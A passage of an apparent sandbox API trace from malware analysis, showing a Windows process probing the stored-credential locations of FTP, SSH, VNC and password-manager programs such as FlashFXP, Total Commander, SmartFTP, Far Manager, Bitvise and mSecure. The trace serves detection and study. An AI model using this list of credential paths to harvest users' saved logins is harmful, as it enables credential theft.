returned 0x78d6c8 [0314.661] GetProcessHeap () returned 0x780000 [0314.662] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b730 | out: hHeap=0x780000) returned 1 [0314.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.662] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0314.663] GetProcessHeap () returned 0x780000 [0314.663] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.663] GetProcessHeap () returned 0x780000 [0314.663] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78d6c8 | out: hHeap=0x780000) returned 1 [0314.663] GetProcessHeap () returned 0x780000 [0314.664] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.664] GetProcessHeap () returned 0x780000 [0314.664] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b568 | out: hHeap=0x780000) returned 1 [0314.664] GetProcessHeap () returned 0x780000 [0314.664] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.665] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.665] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0314.665] GetProcessHeap () returned 0x780000 [0314.665] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x79b520 [0314.666] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.667] wvsprintfW (in: param_1=0x79b520, param_2="%s\\INSoftware\\NovaFTP\\NovaFTP.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 65 [0314.667] GetProcessHeap () returned 0x780000 [0314.667] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a4f8 [0314.667] GetProcessHeap () returned 0x780000 [0314.668] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.668] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 0 [0314.669] GetProcessHeap () returned 0x780000 [0314.669] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a4f8 | out: hHeap=0x780000) returned 1 [0314.669] GetProcessHeap () returned 0x780000 [0314.669] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.669] GetProcessHeap () returned 0x780000 [0314.669] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x79b520 [0314.670] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.671] wvsprintfW (in: param_1=0x79b520, param_2="%s\\NetDrive\\NDSites.ini", arglist=0x19fb9c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 58 [0314.671] GetProcessHeap () returned 0x780000 [0314.671] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x78) returned 0x797490 [0314.671] GetProcessHeap () returned 0x780000 [0314.671] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.672] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 0 [0314.672] GetProcessHeap () returned 0x780000 [0314.672] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797490 | out: hHeap=0x780000) returned 1 [0314.672] GetProcessHeap () returned 0x780000 [0314.672] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x79b520 [0314.673] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.674] wvsprintfW (in: param_1=0x79b520, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 58 [0314.674] GetProcessHeap () returned 0x780000 [0314.674] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x78) returned 0x797010 [0314.674] GetProcessHeap () returned 0x780000 [0314.674] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.675] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 0 [0314.675] GetProcessHeap () returned 0x780000 [0314.675] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797010 | out: hHeap=0x780000) returned 1 [0314.675] GetProcessHeap () returned 0x780000 [0314.676] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.677] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.677] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\ProgramData") returned 0x0 [0314.677] GetProcessHeap () returned 0x780000 [0314.677] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x79b520 [0314.678] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.679] wvsprintfW (in: param_1=0x79b520, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19fb84 | out: param_1="C:\\ProgramData\\NetDrive2\\drives.dat") returned 35 [0314.679] GetProcessHeap () returned 0x780000 [0314.679] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4a) returned 0x798dd8 [0314.680] GetProcessHeap () returned 0x780000 [0314.680] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.681] PathFileExistsW (pszPath="C:\\ProgramData\\NetDrive2\\drives.dat") returned 0 [0314.681] GetProcessHeap () returned 0x780000 [0314.682] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.682] GetProcessHeap () returned 0x780000 [0314.682] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.682] GetProcessHeap () returned 0x780000 [0314.682] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.690] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.691] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Windows") returned 0x0 [0314.691] GetProcessHeap () returned 0x780000 [0314.691] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5c) returned 0x79b520 [0314.692] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.692] wvsprintfW (in: param_1=0x79b520, param_2="%s\\wcx_ftp.ini", arglist=0x19fb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0314.692] GetProcessHeap () returned 0x780000 [0314.692] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x30) returned 0x7967b0 [0314.692] GetProcessHeap () returned 0x780000 [0314.693] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.694] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0314.694] GetProcessHeap () returned 0x780000 [0314.694] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7967b0 | out: hHeap=0x780000) returned 1 [0314.694] GetProcessHeap () returned 0x780000 [0314.694] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.694] GetProcessHeap () returned 0x780000 [0314.694] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5c) returned 0x79b520 [0314.695] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.696] wvsprintfW (in: param_1=0x79b520, param_2="%s\\wcx_ftp.ini", arglist=0x19fb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0314.696] GetProcessHeap () returned 0x780000 [0314.696] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x66) returned 0x798dd8 [0314.696] GetProcessHeap () returned 0x780000 [0314.696] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.697] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0314.697] GetProcessHeap () returned 0x780000 [0314.697] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.697] GetProcessHeap () returned 0x780000 [0314.697] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.698] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.699] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0314.699] GetProcessHeap () returned 0x780000 [0314.699] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5c) returned 0x79b520 [0314.699] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.700] wvsprintfW (in: param_1=0x79b520, param_2="%s\\wcx_ftp.ini", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0314.700] GetProcessHeap () returned 0x780000 [0314.700] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x46) returned 0x79b178 [0314.700] GetProcessHeap () returned 0x780000 [0314.700] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.701] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0314.701] GetProcessHeap () returned 0x780000 [0314.702] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b178 | out: hHeap=0x780000) returned 1 [0314.702] GetProcessHeap () returned 0x780000 [0314.702] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.702] GetProcessHeap () returned 0x780000 [0314.702] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6c) returned 0x79b520 [0314.703] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.704] wvsprintfW (in: param_1=0x79b520, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0314.704] GetProcessHeap () returned 0x780000 [0314.704] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x76) returned 0x797410 [0314.704] GetProcessHeap () returned 0x780000 [0314.704] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.705] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0314.705] GetProcessHeap () returned 0x780000 [0314.706] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797410 | out: hHeap=0x780000) returned 1 [0314.706] GetProcessHeap () returned 0x780000 [0314.706] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79a2e8 [0314.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.707] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fb74*=0x104) returned 0x2 [0314.707] GetProcessHeap () returned 0x780000 [0314.707] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.707] GetProcessHeap () returned 0x780000 [0314.707] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.708] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.708] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0314.708] GetProcessHeap () returned 0x780000 [0314.708] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f56) returned 0x79b520 [0314.709] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.709] wvsprintfW (in: param_1=0x79b520, param_2="%s\\SmartFTP", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 46 [0314.709] GetProcessHeap () returned 0x780000 [0314.709] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x60) returned 0x798dd8 [0314.709] GetProcessHeap () returned 0x780000 [0314.710] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.711] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 0 [0314.711] GetProcessHeap () returned 0x780000 [0314.711] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.711] GetProcessHeap () returned 0x780000 [0314.711] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.711] GetProcessHeap () returned 0x780000 [0314.711] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79a2e8 [0314.711] GetProcessHeap () returned 0x780000 [0314.711] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b568 [0314.712] GetProcessHeap () returned 0x780000 [0314.712] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3d0 [0314.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.713] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far\\Plugins\\FTP\\Hosts", phkResult=0x79b3d0 | out: phkResult=0x79b3d0*=0x0) returned 0x2 [0314.713] GetProcessHeap () returned 0x780000 [0314.713] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3d0 | out: hHeap=0x780000) returned 1 [0314.713] GetProcessHeap () returned 0x780000 [0314.713] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b410 [0314.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.714] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far2\\Plugins\\FTP\\Hosts", phkResult=0x79b410 | out: phkResult=0x79b410*=0x0) returned 0x2 [0314.714] GetProcessHeap () returned 0x780000 [0314.714] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b410 | out: hHeap=0x780000) returned 1 [0314.714] GetProcessHeap () returned 0x780000 [0314.714] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.714] GetProcessHeap () returned 0x780000 [0314.714] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b568 | out: hHeap=0x780000) returned 1 [0314.714] GetProcessHeap () returned 0x780000 [0314.714] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3fd4) returned 0x79b520 [0314.715] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.717] wvsprintfW (in: param_1=0x79b520, param_2="%s\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 109 [0314.717] GetProcessHeap () returned 0x780000 [0314.717] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xde) returned 0x79a2e8 [0314.717] GetProcessHeap () returned 0x780000 [0314.717] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.718] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 0 [0314.718] GetProcessHeap () returned 0x780000 [0314.719] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.719] GetProcessHeap () returned 0x780000 [0314.719] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.719] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.720] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0314.720] Sleep (dwMilliseconds=0xa) [0314.750] GetProcessHeap () returned 0x780000 [0314.750] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79b520 [0314.750] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.751] wvsprintfW (in: param_1=0x79b520, param_2="%s\\%s", arglist=0x19f90c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp") returned 37 [0314.751] GetProcessHeap () returned 0x780000 [0314.751] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4e) returned 0x798dd8 [0314.751] GetProcessHeap () returned 0x780000 [0314.752] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.752] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.tlp"), lpFindFileData=0x19f920 | out: lpFindFileData=0x19f920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x787868, ftLastWriteTime.dwHighDateTime=0x787868, nFileSizeHigh=0x793fd8, nFileSizeLow=0x794670, dwReserved0=0x0, dwReserved1=0x19f97c, cFileName="ը瞆", cAlternateFileName="뒭蕬͈읩葺㓛ﮄ\x19䂑@")) returned 0xffffffff [0314.752] GetProcessHeap () returned 0x780000 [0314.753] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.753] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.753] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.754] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.754] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0314.755] Sleep (dwMilliseconds=0xa) [0314.824] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79b520 [0314.824] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.825] wvsprintfW (in: param_1=0x79b520, param_2="%s\\%s", arglist=0x19f8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp") returned 38 [0314.825] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x50) returned 0x798dd8 [0314.826] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.826] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.bscp"), lpFindFileData=0x19f908 | out: lpFindFileData=0x19f908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x787868, ftLastWriteTime.dwHighDateTime=0x787868, nFileSizeHigh=0x793fd8, nFileSizeLow=0x794088, dwReserved0=0x0, dwReserved1=0x19f964, cFileName="ը瞆", cAlternateFileName="뒭蕬͈읩葂㓛ﭬ\x19䂑@")) returned 0xffffffff [0314.827] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.827] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.827] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79a2e8 [0314.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.828] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Bitvise\\BvSshClient", pszValue="LastUsedProfile", pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fb74*=0x104) returned 0x2 [0314.828] GetProcessHeap () returned 0x780000 [0314.829] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.829] GetProcessHeap () returned 0x780000 [0314.829] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.829] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.830] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0314.831] Sleep (dwMilliseconds=0xa) [0314.858] GetProcessHeap () returned 0x780000 [0314.858] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79b520 [0314.859] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.860] wvsprintfW (in: param_1=0x79b520, param_2="%s\\%s", arglist=0x19f900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc") returned 37 [0314.860] GetProcessHeap () returned 0x780000 [0314.860] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4e) returned 0x798dd8 [0314.860] GetProcessHeap () returned 0x780000 [0314.860] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.861] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.vnc"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x787868, ftLastWriteTime.dwLowDateTime=0x787868, ftLastWriteTime.dwHighDateTime=0x793fd8, nFileSizeHigh=0x794670, nFileSizeLow=0x0, dwReserved0=0x19f96c, dwReserved1=0x77860568, cFileName="", cAlternateFileName="͈읩葊㓛")) returned 0xffffffff [0314.861] GetProcessHeap () returned 0x780000 [0314.861] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.861] GetProcessHeap () returned 0x780000 [0314.862] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.862] GetProcessHeap () returned 0x780000 [0314.862] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.862] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.863] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0314.865] Sleep (dwMilliseconds=0xa) [0314.889] GetProcessHeap () returned 0x780000 [0314.889] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79b520 [0314.890] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.891] wvsprintfW (in: param_1=0x79b520, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc") returned 35 [0314.891] GetProcessHeap () returned 0x780000 [0314.891] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4a) returned 0x79a550 [0314.891] GetProcessHeap () returned 0x780000 [0314.892] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.892] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.vnc"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x787868, ftLastWriteTime.dwLowDateTime=0x787868, ftLastWriteTime.dwHighDateTime=0x793fd8, nFileSizeHigh=0x794280, nFileSizeLow=0x0, dwReserved0=0x19f954, dwReserved1=0x77860568, cFileName="", cAlternateFileName="螚䇆葒㓛")) returned 0xffffffff [0314.892] GetProcessHeap () returned 0x780000 [0314.893] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0314.893] GetProcessHeap () returned 0x780000 [0314.893] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.893] GetProcessHeap () returned 0x780000 [0314.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.894] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.894] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0314.894] GetProcessHeap () returned 0x780000 [0314.894] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f54) returned 0x79b520 [0314.895] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.896] wvsprintfW (in: param_1=0x79b520, param_2="%s\\mSecure", arglist=0x19fb64 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 39 [0314.896] GetProcessHeap () returned 0x780000 [0314.896] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x52) returned 0x79a550 [0314.896] GetProcessHeap () returned 0x780000 [0314.896] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.897] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 0 [0314.897] GetProcessHeap () returned 0x780000 [0314.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.898] GetProcessHeap () returned 0x780000 [0314.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0314.898] GetProcessHeap () returned 0x780000 [0314.898] RtlAllocateHeap 